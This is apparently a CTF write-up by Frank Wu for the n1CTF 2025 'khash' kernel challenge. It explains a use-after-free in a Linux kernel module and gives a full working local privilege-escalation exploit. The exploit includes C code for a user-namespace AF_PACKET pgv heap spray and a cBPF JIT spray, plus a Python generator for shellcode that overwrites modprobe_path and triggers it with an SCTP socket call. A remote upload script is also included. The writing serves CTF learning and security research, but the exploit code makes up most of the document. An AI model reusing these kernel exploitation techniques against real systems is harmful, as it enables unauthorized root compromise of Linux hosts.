Use BPFJIT to solve khash from n1CTF 2025

Exploit a kernel UAF without leaking any address.

In short…

  • n1khash has a delayed-work UAF on a control structure that contains a vtable pointer.
  • We spray pgv arrays to reclaim the freed slot in kmalloc-256.
  • We fill the pgv-backed ring pages with 0xffffffffc1000000 - 0x800, an address inside our sprayed BPF JIT code that acts as a kernel one-gadget.
  • We wait for the delayed work to run and win, with no leak needed.

The vulnerability

When opening /dev/n1khash, the module allocates a control structure from the generic kmalloc-256 cache, without any isolation (no dedicated slab cache).

khash can schedule delayed work. When the work runs, it calls two functions through a vtable pointer stored in the control structure (both vtable[0] and vtable[1] are called).

To queue the delayed work, we use ioctl 0x4010B110.
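The ioctl number itself describes the request. Assuming the module uses the standard Linux _IOC encoding (which x86 uses: nr in bits 0-7, type in bits 8-15, argument size in bits 16-29, direction in bits 30-31), 0x4010B110 decodes to a write-direction command of type 0xB1, number 0x10, carrying a 16-byte argument, which matches the two-uint64_t struct kh_queue_req used in the exploit. The sketch below re-implements that encoding by hand (all helper names are hypothetical) and packs the count field the way the exploit does: delay in milliseconds in the high 32 bits, size in the low 32 bits.

```c
#include <assert.h>
#include <stdint.h>

/* Mirrors struct kh_queue_req from the exploit. */
struct kh_queue_req {
    uint64_t digest_ptr; /* user buffer pointer */
    uint64_t count;      /* hi 32 bits: delay (ms), lo 32 bits: size (bytes) */
};

static_assert(sizeof(struct kh_queue_req) == 16, "ioctl argument is 16 bytes");

/* Generic Linux _IOC layout, re-implemented by hand for illustration:
 * nr in bits 0-7, type in bits 8-15, size in bits 16-29, dir in bits 30-31. */
#define IOC_DIR_WRITE 1u /* same value as the kernel's _IOC_WRITE */

static uint32_t ioc_encode(uint32_t dir, uint32_t type, uint32_t nr, uint32_t size) {
    return (dir << 30) | (size << 16) | (type << 8) | nr;
}

static uint32_t ioc_dir(uint32_t cmd)  { return cmd >> 30; }
static uint32_t ioc_type(uint32_t cmd) { return (cmd >> 8) & 0xff; }
static uint32_t ioc_nr(uint32_t cmd)   { return cmd & 0xff; }
static uint32_t ioc_size(uint32_t cmd) { return (cmd >> 16) & 0x3fff; }

/* Packs the count field the same way main() does: delay high, size low. */
static uint64_t kh_pack_count(uint32_t delay_ms, uint32_t size) {
    return ((uint64_t)delay_ms << 32) | size;
}
```

For instance, ioc_encode(IOC_DIR_WRITE, 0xB1, 0x10, sizeof(struct kh_queue_req)) reproduces 0x4010B110, and kh_pack_count(1000, 0x100) gives the .count value used in main(): a 1000 ms delay and a 0x100-byte size.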

If we close the fd before the delayed work runs, the control structure is freed while the work is still pending, so when the work finally runs it loads the vtable pointer from a freed kmalloc-256 chunk.
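The lifetime bug can be illustrated with a small userspace simulation. It does not touch the driver: a single 256-byte array stands in for the kmalloc-256 slot, and the layout (a vtable pointer at offset 0x28, two function pointers called in order) is an assumption reconstructed from this writeup, not the module's real definition. All names are hypothetical. The "delayed work" simply trusts whatever sits in the slot when it runs, which is exactly what the pending kernel work does after the fd is closed.

```c
#include <assert.h>
#include <string.h>

#define SLOT_SIZE  256  /* one kmalloc-256 object */
#define VTABLE_OFF 0x28 /* assumed offset of the vtable pointer */

typedef void (*sim_fn)(void);

/* Hypothetical vtable: the work handler calls both entries in order. */
struct sim_ops {
    sim_fn fn0;
    sim_fn fn1;
};

/* The single slab slot that is freed and then reclaimed. */
static unsigned char slot[SLOT_SIZE];

static int trace; /* records which functions ran, one decimal digit each */
static void legit0(void) { trace = trace * 10 + 1; }
static void legit1(void) { trace = trace * 10 + 2; }
static void hijack(void) { trace = trace * 10 + 9; }

/* open(): the control structure is placed in the slot. */
static void sim_open(const struct sim_ops *ops) {
    memset(slot, 0, sizeof(slot));
    memcpy(slot + VTABLE_OFF, &ops, sizeof(ops));
}

/* close() frees the slot, and a spray reclaims it with attacker bytes
 * (0x41 filler plus a pointer to an attacker-controlled fake vtable). */
static void sim_close_and_reclaim(const struct sim_ops *fake) {
    memset(slot, 0x41, sizeof(slot));
    memcpy(slot + VTABLE_OFF, &fake, sizeof(fake));
}

/* The delayed work: loads the vtable pointer from the slot, calls both entries. */
static void sim_delayed_work(void) {
    const struct sim_ops *ops;
    memcpy(&ops, slot + VTABLE_OFF, sizeof(ops));
    assert(ops != NULL);
    ops->fn0();
    ops->fn1();
}
```

Without the reclaim, the work calls legit0 then legit1; after sim_close_and_reclaim it calls hijack twice. In the real exploit the fake vtable is a pgv ring page and fn0 is the BPF JIT address; the shellcode ends in a very long msleep, so the worker is parked before it reaches fn1.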

Exploit plan

At this point, we already have two Control-Flow-Hijack (CFH) primitives for free.

I discussed what we can do with a pure CFH in my previous writeup about corCTF, but most of those techniques require at least a kernel .text leak to perform ROP (disabling panic_on_oops, RetSpill, NPerm, or regular stack pivoting).

However, this challenge boots the kernel without KVM enabled, so bypassing KASLR with a hardware side channel is not trivial.

We could certainly reverse the khash module further and look for a good info leak, but I decided to use Ret2BPF directly, since it does not require any info leak.

Thanks to the challenge author for providing the Kconfig: we could quickly confirm that BPF_JIT is enabled (so nice that we did not need to guess the kernel config again and again).
We can also see that STATIC_USERMODE_HELPER is not set, so our shellcode can stay simple: just overwrite modprobe_path or core_pattern instead of performing a ret2usr or a task_struct search.
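Both checks are plain text searches over the provided config. A minimal sketch, assuming the standard .config format in which enabled options appear as CONFIG_FOO=y and disabled ones as "# CONFIG_FOO is not set" (or are absent); the helper name is hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Returns true if the in-memory .config text contains the exact line
 * "CONFIG_<name>=y". Disabled options appear as "# CONFIG_<name> is not set"
 * (or are absent), so they never match. */
static bool kconfig_enabled(const char *config, const char *name) {
    char want[128];
    assert(config != NULL && name != NULL);
    int len = snprintf(want, sizeof(want), "CONFIG_%s=y", name);
    if (len < 0 || (size_t)len >= sizeof(want))
        return false;
    for (const char *p = config; *p; ) {
        size_t n = strcspn(p, "\n"); /* length of the current line */
        if (n == (size_t)len && strncmp(p, want, n) == 0)
            return true;
        p += n;
        if (*p == '\n')
            p++;
    }
    return false;
}
```

Run over the challenge's config, kconfig_enabled(cfg, "BPF_JIT") should be true and kconfig_enabled(cfg, "STATIC_USERMODE_HELPER") false, which is what the two observations above amount to. Matching whole lines avoids false positives such as CONFIG_BPF matching CONFIG_BPF_JIT.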

Also note that unprivileged_bpf_disabled is irrelevant to the cBPF spray used in Ret2BPF, so we do not need to care about it.

Exploit! Exploit! Exploit!

Before actually triggering the CFH, we need to prepare a kmalloc-256 object that holds, at offset 0x28, a pointer to data we control.

I chose the pgv array as a good candidate: it is an elastic array in which every element is a pointer to memory that is shared with userspace and fully controlled by us.

struct pgv {
    char *buffer; // points to a ring-buffer page shared with userspace via mmap
}; // allocated as an array of tp_block_nr entries with GFP_KERNEL

By reclaiming the freed khash control structure with a pgv[32] array, we control the vtable, and therefore the function pointers, without any info leak.
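The arithmetic behind pgv[32] can be written down as compile-time checks. Each struct pgv is a single pointer, so a 32-entry array is exactly 256 bytes and lands in kmalloc-256, and the vtable pointer at offset 0x28 overlaps element 5. A minimal sketch, assuming 8-byte pointers as on x86-64; the helper name is hypothetical.

```c
#include <assert.h>
#include <stddef.h>

/* Same shape as the kernel's struct pgv: one pointer per ring block. */
struct pgv {
    char *buffer;
};

#define PGV_NR     32   /* tp_block_nr in the exploit: PAGE_NUM = 256 / 8 */
#define VTABLE_OFF 0x28 /* offset of khash's vtable pointer */

/* Assumes 8-byte pointers (x86-64). */
static_assert(sizeof(struct pgv[PGV_NR]) == 256, "pg_vec[32] fills a kmalloc-256 slot");
static_assert(VTABLE_OFF % sizeof(struct pgv) == 0, "the field overlaps a whole element");

/* Which pg_vec element overlays a given field offset of the freed object. */
static size_t overlapping_pgv_index(size_t field_off) {
    return field_off / sizeof(struct pgv);
}
```

So the stale vtable pointer becomes pg_vec[5].buffer, i.e. block 5 of some ring, and vtable[0] is the first qword of that block. The exploit simply writes the JIT address into the first qword of every block of every ring, which covers block 5 of whichever array reclaims the slot.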

Then the only thing left is to spray our cBPF programs to get a region of JITed native code. The allocation address of BPF JIT code is highly predictable if we spray enough (0x600 programs of 0x900 instructions each in this exploit).

By simply setting the function pointer to 0xffffffffc1000000 - 0x800, we can jump to the middle of our sprayed BPF JITed code.
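A back-of-the-envelope check that the spray can reach the target. Every number here is an assumption or approximation: each constant load is taken to JIT to the 5-byte mov eax, imm32, prologue and epilogue bytes are ignored, the JIT area is assumed to start at 0xffffffffc0000000 (the x86-64 module area base when KASLR is configured), and the images are assumed to be packed roughly back to back.

```c
#include <assert.h>
#include <stdint.h>

#define JIT_BASE       0xffffffffc0000000ull           /* assumed start of the JIT area */
#define TARGET         (0xffffffffc1000000ull - 0x800) /* fake vtable[0] */
#define NR_PROGS       (0x30ull * 0x20ull)             /* forks x socketpairs per fork */
#define INSNS_PER_PROG 0x900ull
#define BYTES_PER_INSN 5ull                            /* b8 imm32: mov eax, imm32 */

static_assert(TARGET > JIT_BASE, "target lies above the assumed base");

/* Lower bound on JIT output: prologue/epilogue bytes are ignored. */
static uint64_t spray_bytes(void) {
    return NR_PROGS * INSNS_PER_PROG * BYTES_PER_INSN;
}

/* Would a spray packed back to back from JIT_BASE reach TARGET? */
static int spray_reaches_target(void) {
    return JIT_BASE + spray_bytes() > TARGET;
}
```

That is about 16.9 MiB of code against a target roughly 16 MiB past the assumed base. Other modules and per-program overhead also occupy the area, so treat this only as an order-of-magnitude sanity check.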

You can find more details about Ret2BPF in the original writeup and recent discussion.

Since x86 is a variable-length instruction set architecture, we can spray LOAD CONSTANT instructions that load arbitrary 32-bit constants (as long as BPF JIT hardening, i.e. constant blinding, does not apply). By jumping into the middle of those instructions, we trick the CPU into interpreting the 32-bit constants as our shellcode.

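The original Ret2BPF uses 0xb3909090 as the NOP sled. Each LOAD CONSTANT instruction is JITed to b8 xx xx xx xx (mov eax, imm32) with the immediate stored little-endian, so the sled is the byte stream b8 90 90 90 b3 b8 90 90 90 b3 ..., and entering inside an immediate decodes as nops followed by b3 b8 (mov bl, 0xb8).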
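Why the sled works from almost any entry point can be checked with a toy decoder restricted to the three opcodes that occur in it: 90 (nop, 1 byte), b3 (mov bl, imm8, 2 bytes) and b8 (mov eax, imm32, 5 bytes). This simulates x86 instruction lengths for this byte pattern only; it is not a general disassembler, and the names are hypothetical. Entering at byte offset 1 to 4 of any instruction converges to executing the immediate bytes, while entering exactly on a b8 opcode keeps decoding the constants as data.

```c
#include <assert.h>
#include <stddef.h>

#define NR_INSNS 16
#define INSN_LEN 5
#define SLED_LEN (NR_INSNS * INSN_LEN)

/* Fills buf with NR_INSNS JITed sled instructions: mov eax, 0xb3909090,
 * encoded as b8 90 90 90 b3 (opcode, then the little-endian immediate). */
static void build_sled(unsigned char *buf) {
    for (size_t i = 0; i < NR_INSNS; i++) {
        unsigned char *p = buf + i * INSN_LEN;
        p[0] = 0xb8;
        p[1] = 0x90;
        p[2] = 0x90;
        p[3] = 0x90;
        p[4] = 0xb3;
    }
}

/* Instruction length for the three opcodes that occur in the sled only. */
static size_t toy_insn_len(unsigned char op) {
    switch (op) {
    case 0x90: return 1; /* nop */
    case 0xb3: return 2; /* mov bl, imm8 */
    case 0xb8: return 5; /* mov eax, imm32 */
    default:   assert(!"opcode outside this toy model"); return 1;
    }
}

/* Decodes from byte offset `start` to the end of the sled and counts how many
 * mov eax, imm32 instructions are executed. Zero means the CPU is executing
 * the bytes of the immediates themselves. */
static size_t mov_eax_executed(const unsigned char *buf, size_t start) {
    size_t pc = start, count = 0;
    while (pc < SLED_LEN) {
        if (buf[pc] == 0xb8)
            count++;
        pc += toy_insn_len(buf[pc]);
    }
    return count;
}
```

In this model, every entry offset that is not a multiple of 5 ends up in the immediate-executing phase, which is the phase the shellcode constants after the sled are laid out for.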

At the end of the sled, we place our shellcode, split into instructions of at most 3 bytes each, to do the actual privilege escalation.
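Each shellcode instruction therefore has to fit inside one 32-bit constant. The sc.h generator script pads every instruction to 3 bytes with 0x90 and appends 0x3c; in the immediate-executing phase, that trailing 3c together with the next constant's b8 opcode decodes as cmp al, 0xb8 (2 bytes), which steps onto the next shellcode instruction. A C sketch of the same packing (the helper name is hypothetical):

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Packs one x86 instruction of at most 3 bytes into a BPF_LD constant:
 * bytes are padded with 0x90 (nop) to 3 and followed by 0x3c, so that
 * "3c b8" (cmp al, 0xb8) swallows the next JITed mov opcode. The constant
 * is read little-endian, matching struct.unpack('<I', ...) in the script. */
static uint32_t pack_sc_insn(const uint8_t *insn, size_t len) {
    assert(len >= 1 && len <= 3);
    uint8_t b[4] = {0x90, 0x90, 0x90, 0x3c};
    for (size_t i = 0; i < len; i++)
        b[i] = insn[i];
    return (uint32_t)b[0] | (uint32_t)b[1] << 8 | (uint32_t)b[2] << 16 |
           (uint32_t)b[3] << 24;
}
```

For example, rdmsr (0f 32) becomes 0x3c90320f, i.e. the bytes 0f 32 90 3c. The generated sc.h stores such values with filter[idx--] = ..., walking backwards from the end of the program.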

So the main logic of the exploit is:

int main() {
    init();

    bpf_jit_spray(); // 0xffffffffc1000000 - 0x800 will be our kernel one gadget
    puts("BPF JIT spray done.");

    if (fork() == 0) { // setup ns and ready for pgv spray
        spray_pgv_thread();
    }

    int dev = SYSCHK(open(DEV_PATH, O_RDWR | O_CLOEXEC));
    uint8_t buf[0x100];
    memset(buf, 0x41, sizeof(buf));

    struct kh_queue_req req = {
        .digest_ptr = (uint64_t)(uintptr_t)buf,
        .count = ((uint64_t)1000 << 32) | 0x100 // delay 1000 ms, size 0x100
    };
    SYSCHK(ioctl(dev, KH_IOCTL_QUEUE, &req));

    close(dev); // free the control block while the work is still pending
    write(cmd_pipe_req[1], void_buf, 1); // reclaim it with pgv[32] array
    read(cmd_pipe_reply[0], void_buf, 1);
    puts("pgv spray done");

    while (check_modprobe() == 0)
        sleep(1);
    puts("Win !!");
    system("echo -ne '#!/bin/sh\n/bin/cp /flag /tmp/2\n/bin/chmod 777 /tmp/2\n'>/tmp/1");
    system("chmod +x /tmp/1");
    socket(AF_INET, SOCK_STREAM, 132); // IPPROTO_SCTP: makes the kernel run modprobe_path
    system("cat /tmp/2");
}

The full exploit code can be found at the end of this writeup.

Misc notes

modprobe_path

A commit around Linux 6.2 removed the binfmt module autoloading, so executing a file with an unknown binary format no longer invokes modprobe. But we can still use unprivileged syscalls to make the kernel request other modules (ones that are built but not loaded by default), such as:

socket(AF_INET, SOCK_STREAM, 132);

This trick has also been discussed and studied in depth in SyzBridge.
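Protocol 132 is IPPROTO_SCTP. When no handler for it is registered, inet_create() in net/ipv4/af_inet.c calls request_module() with an alias built from the format net-pf-%d-proto-%d-type-%d, and request_module() runs whatever modprobe_path points to. A sketch with named constants (the helper name is hypothetical); it only formats the alias the kernel would ask for and does not create any socket itself.

```c
#include <assert.h>
#include <netinet/in.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>

/* socket(AF_INET, SOCK_STREAM, 132) in the exploit is the same call as
 * socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP). */
static_assert(IPPROTO_SCTP == 132, "protocol 132 is SCTP");

/* Formats the alias that inet_create() passes to request_module() on its
 * first attempt when no handler for (type, protocol) is registered. */
static int inet_proto_alias(char *out, size_t n, int type, int protocol) {
    return snprintf(out, n, "net-pf-%d-proto-%d-type-%d", PF_INET, protocol, type);
}
```

With SOCK_STREAM and IPPROTO_SCTP this yields net-pf-2-proto-132-type-1. Whether the socket call then succeeds does not matter; the request_module() side effect is what runs our script.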

Shellcode

The original copy_from_user shellcode is good enough here. If we want to perform more complex operations in the shellcode, we can clear the WP bit in CR0, copy a larger shellcode from user memory into kernel executable memory, and then jump to it.
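As a sketch of the first step only (not part of the author's exploit): WP is bit 16 of CR0, and under the same 3-byte limit it could be cleared with mov rax, cr0 / mov cl, 16 / btr eax, ecx / mov cr0, rax. Operating on eax zero-extends into rax, which is harmless because bits 63:32 of CR0 are reserved and must be zero. The C below only computes the resulting CR0 value and lists the hand-assembled bytes (names are hypothetical); executing them requires ring 0.

```c
#include <assert.h>
#include <stdint.h>

#define X86_CR0_WP (1ull << 16) /* write protect: ring 0 honors read-only pages */

static_assert(X86_CR0_WP == 0x10000, "WP is CR0 bit 16");

/* The value the shellcode would write back to CR0. */
static uint64_t cr0_without_wp(uint64_t cr0) {
    return cr0 & ~X86_CR0_WP;
}

/* Hand-assembled steps, each at most 3 bytes so it fits one sprayed constant
 * (0x90 pads short instructions, as in the sc.h generator). Ring 0 only. */
static const uint8_t clear_wp_insns[][3] = {
    {0x0f, 0x20, 0xc0}, /* mov rax, cr0 */
    {0xb1, 0x10, 0x90}, /* mov cl, 16 ; nop */
    {0x0f, 0xb3, 0xc8}, /* btr eax, ecx (clears bit 16, zero-extends into rax) */
    {0x0f, 0x22, 0xc0}, /* mov cr0, rax */
};
```

For example, a typical CR0 of 0x80050033 (PG, AM, WP, NE, ET, MP, PE set) becomes 0x80040033.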

End of the Trail

After all those merciless 48h CTF events, it's sweet to have a 24h CTF and enjoy the rest of the weekend at the beach 🥰

Full exploit code

#define _GNU_SOURCE
#include <assert.h>
#include <dirent.h>
#include <endian.h>
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <pthread.h>
#include <sched.h>
#include <setjmp.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/timerfd.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#define SYSCHK(x)                     \
    ({                                \
        typeof(x) __res = (x);        \
        if (__res == (typeof(x))-1)   \
            err(1, "SYSCHK(" #x ")"); \
        __res;                        \
    })

/* =========================== pgv spray =========================== */
#include <arpa/inet.h> /* htons */
#include <net/if.h>
#include <netpacket/packet.h>
#include <net/ethernet.h>
#ifndef TPACKET_V3
#define TPACKET_V3 2
#endif
int cmd_pipe_req[2], cmd_pipe_reply[2];
#define SPRAY_PG_VEC_NUM 20
#define PAGE_NUM (256 / 8) /* 32 ring blocks -> pg_vec array of 32 * 8 = 256 bytes */
int pgfd[SPRAY_PG_VEC_NUM] = {};
void *pgaddr[SPRAY_PG_VEC_NUM] = {};

/* create isolated user/net namespaces so we get CAP_NET_RAW for AF_PACKET */
void unshare_setup(void) {
    char edit[0x100];
    int tmp_fd;
    /* read the ids before unshare: afterwards they read back as the overflow id */
    uid_t uid = getuid();
    gid_t gid = getgid();

    unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

    tmp_fd = open("/proc/self/setgroups", O_WRONLY);
    write(tmp_fd, "deny", strlen("deny"));
    close(tmp_fd);

    tmp_fd = open("/proc/self/uid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %u 1", (unsigned)uid);
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);

    tmp_fd = open("/proc/self/gid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %u 1", (unsigned)gid);
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);
}

struct tpacket_req3 {
    unsigned int tp_block_size;     /* Minimal size of contiguous block */
    unsigned int tp_block_nr;       /* Number of blocks */
    unsigned int tp_frame_size;     /* Size of frame */
    unsigned int tp_frame_nr;       /* Total number of frames */
    unsigned int tp_retire_blk_tov; /* timeout in msecs */
    unsigned int tp_sizeof_priv;    /* offset to private data area */
    unsigned int tp_feature_req_word;
};

void packet_socket_rx_ring_init(int s, unsigned int block_size,
                                unsigned int frame_size, unsigned int block_nr,
                                unsigned int sizeof_priv, unsigned int timeout) {
    int v = TPACKET_V3;
    SYSCHK(setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v)));

    struct tpacket_req3 req;
    memset(&req, 0, sizeof(req));
    req.tp_block_size = block_size;
    req.tp_frame_size = frame_size;
    req.tp_block_nr = block_nr;
    req.tp_frame_nr = (block_size * block_nr) / frame_size;
    req.tp_retire_blk_tov = timeout;
    req.tp_sizeof_priv = sizeof_priv;
    req.tp_feature_req_word = 0;

    SYSCHK(setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req)));
}

int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
                        unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
    int s = SYSCHK(socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)));
    packet_socket_rx_ring_init(s, block_size, frame_size, block_nr, sizeof_priv, timeout);
    struct sockaddr_ll sa;
    memset(&sa, 0, sizeof(sa));
    sa.sll_family = PF_PACKET;
    sa.sll_protocol = htons(ETH_P_ALL);
    sa.sll_ifindex = if_nametoindex("lo");
    SYSCHK(bind(s, (struct sockaddr *)&sa, sizeof(sa)));
    return s;
}

char void_buf[1] = {0};
void spray_pgv_thread() {
    unshare_setup();
    read(cmd_pipe_req[0], void_buf, 1); // wait until main() has closed the khash fd
    for (int i = 0; i < SPRAY_PG_VEC_NUM; i++) {
        // each socket allocates one pg_vec[PAGE_NUM] array in kmalloc-256
        pgfd[i] = packet_socket_setup(0x1000, 2048, PAGE_NUM, 0, 10000);
    }

    for (int i = 0; i < SPRAY_PG_VEC_NUM; i++) {
        if (!pgfd[i])
            continue;
        pgaddr[i] = SYSCHK(mmap(NULL, PAGE_NUM * 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, pgfd[i], 0));
        for (int j = 0; j < PAGE_NUM; j++) {
            // vtable = pg_vec[5].buffer, so put the JIT target in the first qword of every block
            unsigned long *pgv_buff = (unsigned long *)((char *)pgaddr[i] + j * 0x1000);
            pgv_buff[0] = 0xffffffffc1000000 - 0x800;
        }
    }
    write(cmd_pipe_reply[1], void_buf, 1);

    sleep(999); // keep the sockets (and their pg_vec arrays) alive
    exit(0);
}
/* =========================== pgv spray =========================== */

/* ========================= BPF JIT spray ========================= */
struct sock_filter filter[0x1000];
char buf[0x1000];
void bpf_jit_spray(void) {
    // user buffer at 0xa00000: the shellcode copies "/tmp/1" from here into modprobe_path
    char *shellcode = SYSCHK(mmap((void *)0xa00000, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC,
                                  MAP_PRIVATE | MAP_FIXED | MAP_ANON, -1, 0));
    strcpy(shellcode, "/tmp/1");

    int stopfd[2];
    SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, stopfd));

    unsigned int prog_len = 0x900; // In the current environment, the max instructions in a program is near 0x900
    struct sock_filter table[] = {
        {.code = BPF_LD + BPF_K, .k = 0xb3909090}, // NOP sled constant: JITed as b8 90 90 90 b3 (b3 b8: mov bl, 0xb8)
        {.code = BPF_RET + BPF_K, .k = SECCOMP_RET_ALLOW}
    };

    for (int i = 0; i < prog_len; i++) {
        filter[i] = table[0];
    }

    filter[prog_len - 1] = table[1];
    int idx = prog_len - 2;

#include "sc.h" // shellcode constants, filled backwards from idx

    struct sock_fprog prog = {
        .len = prog_len,
        .filter = filter,
    };

    int fd[2];
    int fork_limit = 0x30;
    for (int k = 0; k < fork_limit; k++) {
        if (fork() == 0) {
            close(stopfd[1]); // use fork to bypass RLIMIT_NOFILE limit.
            for (int i = 0; i < 0x20; i++) {
                SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, fd));
                SYSCHK(setsockopt(fd[0], SOL_SOCKET, SO_ATTACH_FILTER, &prog, sizeof(prog)));
            }
            write(stopfd[0], buf, 1);
            read(stopfd[0], buf, 1); // blocks (the parent never writes), keeping the filters attached
            exit(0);
        }
    }
    /* wait for all forks to finish spraying BPF code; a single read() may return early */
    for (int got = 0; got < fork_limit;) {
        ssize_t n = read(stopfd[1], buf, fork_limit - got);
        if (n <= 0)
            err(1, "read(stopfd)");
        got += n;
    }
}

int check_modprobe() {
    char buf[0x100] = {};
    int modprobe = open("/proc/sys/kernel/modprobe", O_RDONLY);
    read(modprobe, buf, sizeof(buf) - 1); // keep a terminating NUL for printf/strncmp
    printf("modprobe: %20s\n", buf);
    close(modprobe);
    char *old = "/sbin/modprobe";
    return strncmp(buf, old, strlen(old)) != 0;
}
/* ========================= BPF JIT spray ========================= */

#define DEV_PATH "/dev/n1khash"
#define KH_IOCTL_QUEUE 0x4010B110

struct kh_queue_req {
    uint64_t digest_ptr; // user buffer pointer (if used by driver)
    uint64_t count;      // hi: delay (ms), lo: size (bytes, 16-byte aligned, <= 0x1000)
};

void init() {
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
    pipe(cmd_pipe_req);
    pipe(cmd_pipe_reply);
    // pin_on_cpu(0);

    struct rlimit rlim = {.rlim_cur = 0xf000, .rlim_max = 0xf000};
    setrlimit(RLIMIT_NOFILE, &rlim);

    // Ignore SIGPIPE
    signal(SIGPIPE, SIG_IGN);
}

int main() {
    init();

    bpf_jit_spray(); // 0xffffffffc1000000 - 0x800 will be our kernel one gadget
    puts("BPF JIT spray done.");

    if (fork() == 0) { // setup ns and ready for pgv spray
        spray_pgv_thread();
    }

    int dev = SYSCHK(open(DEV_PATH, O_RDWR | O_CLOEXEC));
    uint8_t buf[0x100];
    memset(buf, 0x41, sizeof(buf));

    struct kh_queue_req req = {
        .digest_ptr = (uint64_t)(uintptr_t)buf,
        .count = ((uint64_t)1000 << 32) | 0x100 // delay 1000 ms, size 0x100
    };
    SYSCHK(ioctl(dev, KH_IOCTL_QUEUE, &req));

    close(dev); // free the control block while the work is still pending
    write(cmd_pipe_req[1], void_buf, 1); // reclaim it with pgv[32] array
    read(cmd_pipe_reply[0], void_buf, 1);
    puts("pgv spray done");

    while (check_modprobe() == 0)
        sleep(1);
    puts("Win !!");
    system("echo -ne '#!/bin/sh\n/bin/cp /flag /tmp/flag\n/bin/chmod 777 /tmp/flag\n' > /tmp/1");
    system("chmod +x /tmp/1");
    socket(AF_INET, SOCK_STREAM, 132); // IPPROTO_SCTP: makes the kernel run modprobe_path
    system("cat /tmp/flag");
}

Generate sc.h with the following Python script (gen.py):

#!/usr/bin/env python3

from pwn import *
import struct

entry_syscall = 0xffffffff82800080  # entry_SYSCALL_64
modprobe_path = 0xffffffff84194620
copy_from_user = 0xffffffff81b6ffa0
msleep = 0xffffffff81271380

off1 = entry_syscall - modprobe_path
off2 = modprobe_path - copy_from_user
off3 = copy_from_user - msleep


context.arch = 'amd64'


def load_reg(_reg, _val):  # emit <= 3-byte instructions computing _reg -= _val (clobbers rsi)
    ins = ["sub", "add"]
    return f'''
xor esi,esi
mov sil, {(abs(_val) >> 24) & 0xff}
shl esi, 8
mov sil, {(abs(_val) >> 16) & 0xff}
shl esi, 8
mov sil, {(abs(_val) >> 8) & 0xff}
shl esi, 8
mov sil, {(abs(_val)) & 0xff}
{ins[_val < 0]} {_reg}, rsi
'''


ASM = f"""
; rdmsr(MSR_LSTAR): EDX:EAX = address of entry_SYSCALL_64; ECX must be MSR_LSTAR ( 0xc0000082 )
xor edx, edx
mov cl, 0xc0
shl ecx, 24
mov cl, 0x82
rdmsr
; make rdx = entry_SYSCALL_64's address
mov cl, 32
shl rdx, cl
add rdx, rax
; entry_SYSCALL_64 + offset = modprobe_path
; move modprobe_path to rdi ( 1st arg )
{load_reg('rdx', off1)}
mov rdi, rdx
; move copy_from_user to rax
{load_reg('rdx', off2)}
mov rax, rdx
; call copy_from_user(modprobe_path, user_buf, 0x30); user_buf = 0xa00000
xor esi, esi
mov sil, 0xa0
shl esi, 16
xor edx, edx
mov dl, 0x30
push rax
call rax
pop rax
{load_reg('rax', off3)}
; move 0x7000000 to rdi ( 1st arg ), then call msleep(0x7000000)
xor edi,edi
mov dil,0x70
shl edi,20
call rax
"""
# msleep is better than jmp $+0


with open("sc.h", "w") as f:
    for a in ASM.strip().split("\n")[::-1]:
        if a.strip() == '' or a[0] == ';':
            continue
        cur = asm(a)
        assert len(cur) <= 3
        cur = hex(struct.unpack('<I', cur.ljust(3, b'\x90') + b'\x3c')[0])
        sc = "filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = " + cur + "};"
        print(sc)
        f.write(sc + "\n")

Interacting with the remote:

import os, base64, gzip
from pwn import *
from tqdm import tqdm
import subprocess

TMP_PATH = "/tmp"
SEP = b"bash-5.2$ "


os.system("python3 gen.py")
os.system("musl-gcc --static 1.c -o exploit")
with open("exploit", "rb") as f_in, gzip.open("exp.gz", "wb") as f_out:
    f_out.write(f_in.read())

with open("exp.gz", "rb") as f:
    exp = base64.b64encode(f.read())

# p = remote("60.205.163.215", 42675)
p = process(['./run.sh'])

print(p.recvuntil(SEP).decode())
for i in range(0, len(exp), 0x200):
    p.sendline(b"echo -n \"" + exp[i:i + 0x200] + f"\" >> {TMP_PATH}/b64_exp".encode())

for i in tqdm(range(0, len(exp), 0x200)):
    p.recvuntil(SEP)

p.sendline(b"ls")
p.sendlineafter(SEP, f"cat {TMP_PATH}/b64_exp | base64 -d > {TMP_PATH}/exp.gz".encode())
p.sendlineafter(SEP, f"gzip -dc {TMP_PATH}/exp.gz > {TMP_PATH}/exploit".encode())
p.sendlineafter(SEP, f"chmod +x {TMP_PATH}/exploit".encode())
p.sendlineafter(SEP, f"{TMP_PATH}/exploit".encode())
p.interactive()


https://ghostfrankwu.github.io/2025/11/02/2025n1/

Author

Frank Wu

Published on

2025-11-02

Updated on

2025-11-03

License